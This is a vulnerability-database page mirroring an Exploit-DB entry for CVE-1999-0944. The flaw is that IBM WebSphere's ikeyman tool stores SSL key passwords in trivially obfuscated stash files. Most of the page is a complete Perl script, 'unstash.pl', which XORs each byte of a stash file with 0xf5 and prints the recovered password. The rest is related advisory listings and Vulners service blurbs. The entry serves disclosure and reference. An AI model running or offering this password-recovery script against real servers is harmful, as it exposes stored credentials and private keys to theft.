Lucene search
+L

IBM Websphere 2.0/3.0 - ikeyman Weak Encrypted Password

🗓️ 24 Oct 1999 00:00:00Reported by Ben LaurieType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

IBM WebSphere's ikeyman tool contains a weakness allowing easy decryption of stored passwords.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-1999-0944
4 Feb 200005:00
cve
cvelist
Cvelist
CVE-1999-0944
4 Feb 200005:00
cvelist
euvd
EUVD
EUVD-1999-0925
7 Oct 202500:30
euvd
nvd
NVD
CVE-1999-0944
24 Oct 199904:00
nvd
ptsecurity
Positive Technologies
PT-1999-1482 · Ibm · Ibm Websphere
24 Oct 199900:00
ptsecurity
source: https://www.securityfocus.com/bid/1763/info


IBM WebSphere ships with a tool called 'ikeyman' that encrypts server certificates/key pairs when the IBM HTTP Server and SSL connections are enabled. Ikeyman stores the password in a stash file which can be easily decrypted through the use of a freely available script

#!/usr/bin/perl -w
#
# unstash.pl - "decrypt" IBM HTTP server stash files. No, really. They
*are* this pathetic.
#
# sploit (BoByRiTe) 1999, Major Malfunction, code by Ben Laurie, cos I
dudn't dud perly thing.

use strict;

die "Usage: $0 <stash file>\n" if $#ARGV != 0;

my $file=$ARGV[0];
open(F,$file) || die "Can't open $file: $!";

my $stash;
read F,$stash,1024;

my @unstash=map { $_^0xf5 } unpack("C*",$stash);

foreach my $c (@unstash) {
    last if $c eq 0;
    printf "%c",$c;
}
printf "\n";

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Aug 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.04204
37